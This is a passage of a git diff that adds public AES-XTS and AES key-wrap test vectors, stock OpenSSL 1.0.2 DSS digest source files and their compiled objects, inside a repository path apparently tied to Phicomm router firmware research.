10355165c8b9a6d0a7de8b062c4500dc4cd120c0f7418dae3d0b5781c34803fa75421c790dfe1de1834f280d7667b327f6c8cd7557e12ac3a0f93ec05c52e0493ef31a12d3d9260f79a289d6a379bc70c50841473d1a8cc81ec583e9645e07b8d9670655ba5bbcfecc6dc3966380ad8fecb17b6ba02469a020a84e18e8f84252070c13e9f1f289be54fbc481457778f616015e1327a02b140f1505eb309326d68378f8374595c849d84f4c333ec4423885143cb47bd71c5edae9be69a2ffeceb1bec9de244fbe15992b11b77c040f12bd8f6a975a44a0f90c29a9abc3d4d893927284c58754cce294529f8614dcd2aba991925fedc4ae74ffac6e333b93eb4aff0479da9a410e4450e0dd7ae4c6e2910900575da401fc07059f645e8b7e9bfdef33943054ff84011493c27b3429eaedb4ed5376441a77ed43851ad77f16f541dfd269d50d6a5f14fb0aab1cbb4c1550be97f7ab4066193c4caa773dad38014bd2092fa755c824bb5e54c4f36ffda9fcea70b9c6e693e148c151
+aes-256-xts:27182818284590452353602874713526624977572470936999595749669676273141592653589793238462643383279502884197169399375105820974944592:ffff0000000000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:77a31251618a15e6b92d1d66dffe7b50b50bad552305ba0217a610688eff7e11e1d0225438e093242d6db274fde801d4cae06f2092c728b2478559df58e837c2469ee4a4fa794e4bbc7f39bc026e3cb72c33b0888f25b4acf56a2a9804f1ce6d3d6e1dc6ca181d4b546179d55544aa7760c40d06741539c7e3cd9d2f6650b2013fd0eeb8c2b8e3d8d240ccae2d4c98320a7442e1c8d75a42d6e6cfa4c2eca1798d158c7aecdf82490f24bb9b38e108bcda12c3faf9a21141c3613b58367f922aaa26cd22f23d708dae699ad7cb40a8ad0b6e2784973dcb605684c08b8d6998c69aac049921871ebb65301a4619ca80ecb485a31d744223ce8ddc2394828d6a80470c092f5ba413c3378fa6054255c6f9df4495862bbb3287681f931b687c888abf844dfc8fc28331e579928cd12bd2390ae123cf03818d14dedde5c0c24c8ab018bfca75ca096f2d531f3d1619e785f1ada437cab92e980558b3dce1474afb75bfedbf8ff54cb2618e0244c9ac0d3c66fb51598cd2db11f9be39791abe447c63094f7c453b7ff87cb5bb36b7c79efb0872d17058b83b15ab0866ad8a58656c5a7e20dbdf308b2461d97c0ec0024a2715055249cf3b478ddd4740de654f75ca686e0d7345c69ed50cdc2a8b332b1f8824108ac937eb050585608ee734097fc09054fbff89eeaeea791f4a7ab1f9868294a4f9e27b42af8100cb9d59cef9645803
+aes-256-xts:27182818284590452353602874713526624977572470936999595749669676273141592653589793238462643383279502884197169399375105820974944592:ffffff00000000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:e387aaa58ba483afa7e8eb469778317ecf4cf573aa9d4eac23f2cdf914e4e200a8b490e42ee646802dc6ee2b471b278195d60918ececb44bf79966f83faba0499298ebc699c0c8634715a320bb4f075d622e74c8c932004f25b41e361025b5a87815391f6108fc4afa6a05d9303c6ba68a128a55705d415985832fdeaae6c8e19110e84d1b1f199a2692119edc96132658f09da7c623efcec712537a3d94c0bf5d7e352ec94ae5797fdb377dc1551150721adf15bd26a8efc2fcaad56881fa9e62462c28f30ae1ceaca93c345cf243b73f542e2074a705bd2643bb9f7cc79bb6e7091ea6e232df0f9ad0d6cf502327876d82207abf2115cdacf6d5a48f6c1879a65b115f0f8b3cb3c59d15dd8c769bc014795a1837f3901b5845eb491adfefe097b1fa30a12fc1f65ba22905031539971a10f2f36c321bb51331cdefb39e3964c7ef079994f5b69b2edd83a71ef549971ee93f44eac3938fcdd61d01fa71799da3a8091c4c48aa9ed263ff0749df95d44fef6a0bb578ec69456aa5408ae32c7af08ad7ba8921287e3bbee31b767be06a0e705c864a769137df28292283ea81a2480241b44d9921cdbec1bc28dc1fda114bd8e5217ac9d8ebafa720e9da4f9ace231cc949e5b96fe76ffc21063fddc83a6b8679c00d35e09576a875305bed5f36ed242c8900dd1fa965bc950dfce09b132263a1eef52dd6888c309f5a7d712826
+aes-256-xts:27182818284590452353602874713526624977572470936999595749669676273141592653589793238462643383279502884197169399375105820974944592:ffffffff000000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:bf53d2dade78e822a4d949a9bc6766b01b06a8ef70d26748c6a7fc36d80ae4c5520f7c4ab0ac8544424fa405162fef5a6b7f229498063618d39f0003cb5fb8d1c86b643497da1ff945c8d3bedeca4f479702a7a735f043ddb1d6aaade3c4a0ac7ca7f3fa5279bef56f82cd7a2f38672e824814e10700300a055e1630b8f1cb0e919f5e942010a416e2bf48cb46993d3cb6a51c19bacf864785a00bc2ecff15d350875b246ed53e68be6f55bd7e05cfc2b2ed6432198a6444b6d8c247fab941f569768b5c429366f1d3f00f0345b96123d56204c01c63b22ce78baf116e525ed90fdea39fa469494d3866c31e05f295ff21fea8d4e6e13d67e47ce722e9698a1c1048d68ebcde76b86fcf976eab8aa9790268b7068e017a8b9b749409514f1053027fd16c3786ea1bac5f15cb79711ee2abe82f5cf8b13ae73030ef5b9e4457e75d1304f988d62dd6fc4b94ed38ba831da4b7634971b6cd8ec325d9c61c00f1df73627ed3745a5e8489f3a95c69639c32cd6e1d537a85f75cc844726e8a72fc0077ad22000f1d5078f6b866318c668f1ad03d5a5fced5219f2eabbd0aa5c0f460d183f04404a0d6f469558e81fab24a167905ab4c7878502ad3e38fdbe62a41556cec37325759533ce8f25f367c87bb5578d667ae93f9e2fd99bcbc5f2fbba88cf6516139420fcff3b7361d86322c4bd84c82f335abb152c4a93411373aaa8220
+aes-256-xts:27182818284590452353602874713526624977572470936999595749669676273141592653589793238462643383279502884197169399375105820974944592:ffffffffff0000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:64497e5a831e4a932c09be3e5393376daa599548b816031d224bbf50a818ed2350eae7e96087c8a0db51ad290bd00c1ac1620857635bf246c176ab463be30b808da548081ac847b158e1264be25bb0910bbc92647108089415d45fab1b3d2604e8a8eff1ae4020cfa39936b66827b23f371b92200be90251e6d73c5f86de5fd4a950781933d79a28272b782a2ec313efdfcc0628f43d744c2dc2ff3dcb66999b50c7ca895b0c64791eeaa5f29499fb1c026f84ce5b5c72ba1083cddb5ce45434631665c333b60b11593fb253c5179a2c8db813782a004856a1653011e93fb6d876c18366dd8683f53412c0c180f9c848592d593f8609ca736317d356e13e2bff3a9f59cd9aeb19cd482593d8c46128bb32423b37a9adfb482b99453fbe25a41bf6feb4aa0bef5ed24bf73c762978025482c13115e4015aac992e5613a3b5c2f685b84795cb6e9b2656d8c88157e52c42f978d8634c43d06fea928f2822e465aa6576e9bf419384506cc3ce3c54ac1a6f67dc66f3b30191e698380bc999b05abce19dc0c6dcc2dd001ec535ba18deb2df1a101023108318c75dc98611a09dc48a0acdec676fabdf222f07e026f059b672b56e5cbc8e1d21bbd867dd927212054681d70ea737134cdfce93b6f82ae22423274e58a0821cc5502e2d0ab4585e94de6975be5e0b4efce51cd3e70c25a1fbbbd609d273ad5b0d59631c531f6a0a57b9
+
+aes-128-xts:fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0bfbebdbcbbbab9b8b7b6b5b4b3b2b1b0:9a785634120000000000000000000000:000102030405060708090a0b0c0d0e0f10:6c1625db4671522d3d7599601de7ca09ed
+aes-128-xts:fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0bfbebdbcbbbab9b8b7b6b5b4b3b2b1b0:9a785634120000000000000000000000:000102030405060708090a0b0c0d0e0f1011:d069444b7a7e0cab09e24447d24deb1fedbf
+aes-128-xts:fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0bfbebdbcbbbab9b8b7b6b5b4b3b2b1b0:9a785634120000000000000000000000:000102030405060708090a0b0c0d0e0f101112:e5df1351c0544ba1350b3363cd8ef4beedbf9d
+aes-128-xts:fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0bfbebdbcbbbab9b8b7b6b5b4b3b2b1b0:9a785634120000000000000000000000:000102030405060708090a0b0c0d0e0f10111213:9d84c813f719aa2c7be3f66171c7c5c2edbf9dac
+aes-128-xts:e0e1e2e3e4e5e6e7e8e9eaebecedeeefc0c1c2c3c4c5c6c7c8c9cacbcccdcecf:21436587a90000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:38b45812ef43a05bd957e545907e223b954ab4aaf088303ad910eadf14b42be68b2461149d8c8ba85f992be970bc621f1b06573f63e867bf5875acafa04e42ccbd7bd3c2a0fb1fff791ec5ec36c66ae4ac1e806d81fbf709dbe29e471fad38549c8e66f5345d7c1eb94f405d1ec785cc6f6a68f6254dd8339f9d84057e01a17741990482999516b5611a38f41bb6478e6f173f320805dd71b1932fc333cb9ee39936beea9ad96fa10fb4112b901734ddad40bc1878995f8e11aee7d141a2f5d48b7a4e1e7f0b2c04830e69a4fd1378411c2f287edf48c6c4e5c247a19680f7fe41cefbd49b582106e3616cbbe4dfb2344b2ae9519391f3e0fb4922254b1d6d2d19c6d4d537b3a26f3bcc51588b32f3eca0829b6a5ac72578fb814fb43cf80d64a233e3f997a3f02683342f2b33d25b492536b93becb2f5e1a8b82f5b883342729e8ae09d16938841a21a97fb543eea3bbff59f13c1a18449e398701c1ad51648346cbc04c27bb2da3b93a1372ccae548fb53bee476f9e9c91773b1bb19828394d55d3e1a20ed69113a860b6829ffa847224604435070221b257e8dff783615d2cae4803a93aa4334ab482a0afac9c0aeda70b45a481df5dec5df8cc0f423c77a5fd46cd312021d4b438862419a791be03bb4d97c0e59578542531ba466a83baf92cefc151b5cc1611a167893819b63fb8a6b18e86de60290fa72b797b0ce59f3
+# AES wrap tests from RFC3394
+id-aes128-wrap:000102030405060708090A0B0C0D0E0F::00112233445566778899AABBCCDDEEFF:1FA68B0A8112B447AEF34BD8FB5A7B829D3E862371D2CFE5
+id-aes192-wrap:000102030405060708090A0B0C0D0E0F1011121314151617::00112233445566778899AABBCCDDEEFF:96778B25AE6CA435F92B5B97C050AED2468AB8A17AD84E5D
+id-aes256-wrap:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F::00112233445566778899AABBCCDDEEFF:64E8C3F9CE0F5BA263E9777905818A2A93C8191E7D6E8AE7
+id-aes192-wrap:000102030405060708090A0B0C0D0E0F1011121314151617::00112233445566778899AABBCCDDEEFF0001020304050607:031D33264E15D33268F24EC260743EDCE1C6C7DDEE725A936BA814915C6762D2
+id-aes256-wrap:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F::00112233445566778899AABBCCDDEEFF0001020304050607:A8F9BC1612C68B3FF6E6F4FBE30E71E4769C8B80A32CB8958CD5D17D6B254DA1
+id-aes256-wrap:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F::00112233445566778899AABBCCDDEEFF000102030405060708090A0B0C0D0E0F:28C9F404C4B810F4CBCCB35CFB87F8263F5786E2D80ED326CBC7F0E71A99F43BFB988B9B7A02DD21
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_dss.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_dss.c
new file mode 100644
index 0000000..1478448
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_dss.c
@@ -0,0 +1,104 @@
+/* crypto/evp/m_dss.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/sha.h>
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+
+#ifndef OPENSSL_NO_SHA
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return SHA1_Init(ctx->md_data);
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return SHA1_Update(ctx->md_data, data, count);
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return SHA1_Final(md, ctx->md_data);
+}
+
+static const EVP_MD dsa_md = {
+    NID_dsaWithSHA,
+    NID_dsaWithSHA,
+    SHA_DIGEST_LENGTH,
+    EVP_MD_FLAG_PKEY_DIGEST,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_DSA_method,
+    SHA_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(SHA_CTX),
+};
+
+const EVP_MD *EVP_dss(void)
+{
+    return (&dsa_md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_dss.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_dss.o
new file mode 100644
index 0000000000000000000000000000000000000000..3c21f6a14eb9ca311065b4a2cd620062894b5d9e
GIT binary patch
literal 2456
zcmbuB-%b-j6vj^}3K|6b6GMVA8%+#E*|bVjyf7`$Qj$iDP=krdy3mDI>9)3816}~P
zgqZjkUit_ozJ#yfrSZbXnBe(l=ag~T-rz}Q&pE%&cV=d1c3>}8%=aY{B$lAZbest#
z`gZ0x&Zsa$BQ#7uN3Q=~Jm?e-ek~q0#=hehpu*u^ujGTO^i|a$nq`l6Mdy9mpVkE|
zM7_7%^14WdeMQGzw=g&N$eJjvwf&%N&Di(s)KvOGTczpUyD2+0JsILq(a&y_8z#T-
zq(nT=FJMV-Fqwbi{WD5zk0!>41_nR!i-hKy>Opi_d$5#_FBoh-hOKHgq<t@kJ?p0*
zM{&O=V|NsDm)ZZTN^+&Bonz2v)RDD}XfC;|=c?uwdzkQXjuYxFDoop<Q_rNq4a~C~
zG}CUJB+TlhCF%T0$RtSvC-@B}*pH|^WDv*adhn$l`~~w%yy7YLFxf|!<GA{-dvK~b
z<yOmHr;V!bZc)2Yb_0*9el?(S%XMmHau$k9v)Q7vl+Q2cR-BdWY%%B1av_^`@=Bw^
zQYcjMBGkF(Pf?lXm$Oc*y6LOno!6{x>|nmrc(CES#M}OJ6dLv&hLeI=xSVxxtWWqP
z$1w1V+=Pz-vf=z<42v7gQqN;9=W8OubxIk7OJAUZ!Q~qTvNXq-XkzAi!KIeek^Ytz
zywqN}>@(S|om$|ou@9P|uSnGNwp=^#wga+x7hST~`2E|8B1dF5>twIjYc<d3UVc6B
zY`%4-T7kR%M(3M;+io=L4X+vOXth^yHkxkD({uVCXR#Q2ayC*Vqw|>vM_<$Monx;v
zCgj)xWP7Ea;r9ToeBp8)ZZQLo-cagLYOU#_<KN*QQS-F=`>c%{f1f$bytj~Bco>%E
zIBxy>di|oueSp6y(e>k=!T2d|rge03+k_m;`o$LwW_G<P9ZVS07v~zcCC;^J6IySX
zkYky@;D7^kjp_?pUy+X5NA-2)aqq7abAE8!i(bx8+}IfEvmU>rJ^n5Y$LMj_Mb8c+
d`lMkSiD9~2m*9?z)32)keu#FvJ;NZX{|lh1v{3*6

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_dss1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_dss1.c
new file mode 100644
index 0000000..e36fabf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_dss1.c
@@ -0,0 +1,105 @@
+/* crypto/evp/m_dss1.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_SHA
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/sha.h>
+# ifndef OPENSSL_NO_DSA
+#  include <openssl/dsa.h>
+# endif
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return SHA1_Init(ctx->md_data);
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return SHA1_Update(ctx->md_data, data, count);
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return SHA1_Final(md, ctx->md_data);
+}
+
+static const EVP_MD dss1_md = {
+    NID_dsa,
+    NID_dsaWithSHA1,
+    SHA_DIGEST_LENGTH,
+    EVP_MD_FLAG_PKEY_DIGEST,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_DSA_method,
+    SHA_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(SHA_CTX),
+};
+
+const EVP_MD *EVP_dss1(void)
+{
+    return (&dss1_md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_dss1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_dss1.o
new file mode 100644
index 0000000000000000000000000000000000000000..4220cc00a8291ce59c86519bb032c0665be67a37
GIT binary patch
literal 2456
zcmbuA-%k@k5XYw!1q}lJNF>3SOEd<eTv{a>crY!{Qj$hgz>sKi7JAS|`os2Ws1Lv^
zAtwGAKKdt^_)qvR_-K5vF(x?QyP2{c*B6{*Z)QF_GrN1cx3{0kXZvC?Qi;)HI`Nbe
zeLHtzr+hO-BQ#7uM{fRJI_%^Qe=Qx=$G)QnD0j5q%lY6}`s&vp@>sv+c1`>~(Pvet
zH^&V%vr;6*x+Hd2EzZx+S`%v<t*Y0uX6y%cVk-Hl<-5tf`w2TSJsIF2qo36%H%xx<
